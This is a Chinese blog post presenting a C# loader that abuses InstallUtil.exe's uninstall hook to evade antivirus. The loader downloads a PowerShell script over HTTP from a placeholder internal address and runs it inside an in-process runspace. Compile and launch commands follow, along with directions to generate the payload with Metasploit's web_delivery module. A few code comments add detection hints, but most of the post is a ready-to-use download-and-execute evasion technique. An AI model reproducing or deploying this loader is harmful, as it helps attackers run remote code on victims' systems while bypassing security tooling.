  • Csharp使用Pipeline管道来执行PS规避杀软

    落地代码如下

    using System;
    using System.Net;
    using System.IO;
    using System.Configuration.Install;
    using System.Runtime.InteropServices;
    using System.Management.Automation.Runspaces;
    
    
    /// <summary>
    /// Placeholder entry point. Running the executable directly does nothing;
    /// the assembly only does work when InstallUtil.exe drives <c>Sample.Uninstall</c>.
    /// </summary>
    public class Program
    {
        public static void Main()
        {
        }
    }
    /// <summary>
    /// Installer hook discovered by InstallUtil.exe through <c>RunInstaller(true)</c>.
    /// Only <see cref="Uninstall"/> is overridden, so the payload runs when the
    /// assembly is passed to <c>InstallUtil.exe /u</c> (the command shown below),
    /// not when it is installed or executed directly.
    /// </summary>
    /// <remarks>
    /// Detection note: InstallUtil.exe is a signed .NET utility, so a child process
    /// named powershell.exe never appears here; the observable signal is
    /// InstallUtil.exe loading System.Management.Automation and opening an
    /// outbound HTTP connection from <c>Mycode.Exec</c>.
    /// </remarks>
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        /// <summary>Entry point reached by <c>InstallUtil /u</c>; delegates to <c>Mycode.Exec()</c>.</summary>
        /// <param name="savedState">Installer state from the install phase; unused here.</param>
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            Mycode.Exec();
        }
    }
    /// <summary>
    /// Fetches a PowerShell script from a hard-coded HTTP address and runs it
    /// in-process through a System.Management.Automation runspace instead of
    /// launching powershell.exe. Reached from <c>Sample.Uninstall</c>.
    /// </summary>
    public class Mycode
    {
        /// <summary>
        /// Downloads the script text, executes it asynchronously in a freshly opened
        /// runspace, polls until the pipeline leaves the Running/Stopping states, then
        /// echoes every output and error record to the console.
        /// </summary>
        /// <remarks>
        /// Review notes (defensive): the script is fetched over plaintext HTTP from a
        /// placeholder address (192.168.xxx.xxx) with no authentication or integrity
        /// check, so whatever the server returns is executed verbatim. Because the real
        /// PowerShell engine is loaded into the calling process, engine-side controls
        /// (AMSI, script block / module logging, execution-policy and language-mode
        /// settings) are the relevant detection points; which of them apply depends on
        /// the engine version the referenced assembly resolves to (TODO confirm on the
        /// target build). A non-PowerShell host loading System.Management.Automation and
        /// then making an outbound HTTP request is itself a useful hunting signal.
        /// </remarks>
        public static void Exec()
        {
            WebClient client = new WebClient();
            // Remote command execution: the entire response body becomes the script.
            Stream stream = client.OpenRead("http://192.168.xxx.xxx/powershell.txt");
            StreamReader reader = new StreamReader(stream);
            String command = reader.ReadToEnd();
            //String command = "powershell.exe -c calc";
            //Console.WriteLine(text);

            //string command = System.IO.File.ReadAllText(text);
            // Default runspace configuration; the code applies no restrictions to it.
            RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create();
            Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg);
            rspace.Open();
            Pipeline pipeline = rspace.CreatePipeline();
            pipeline.Commands.AddScript(command);
            pipeline.InvokeAsync();
            // Poll every 50 ms until the pipeline is no longer running or stopping.
            while (pipeline.PipelineStateInfo.State == PipelineState.Running || pipeline.PipelineStateInfo.State == PipelineState.Stopping)
            {
                System.Threading.Thread.Sleep(50);
            }
            // Printed only after the script has already finished.
            Console.WriteLine("Installing...");

            // Output records are written to stdout.
            foreach (object item in pipeline.Output.ReadToEnd())
            {
                if (item != null)
                {
                    Console.WriteLine(item.ToString());
                }
            }
            // Error records are also written to stdout, not stderr.
            foreach (object item in pipeline.Error.ReadToEnd())
            {
                if (item != null)
                {
                    Console.WriteLine(item.ToString());
                }
            }
        }
    }

    保存为Program.cs文件后执行如下命令:

    在MSF上使用multi/script/web_delivery生成PSH模块
    
    >C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /r:C:WindowsMicrosoft.NETassemblyGAC_MSILSystem.Management.Automationv4.0_3.0.0.0__31bf3856ad364e35System.Management.Automation.dll /unsafe /platform:anycpu /out:ps.exe Program.cs
    
    >C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile= /LogToConsole=True /u .ps.exe

    其中 DLL 文件的路径可以在 PowerShell 中执行 [psobject].Assembly.Location 查询到

     VirusTotal

  • 原文地址:https://www.cnblogs.com/wh4am1/p/14366800.html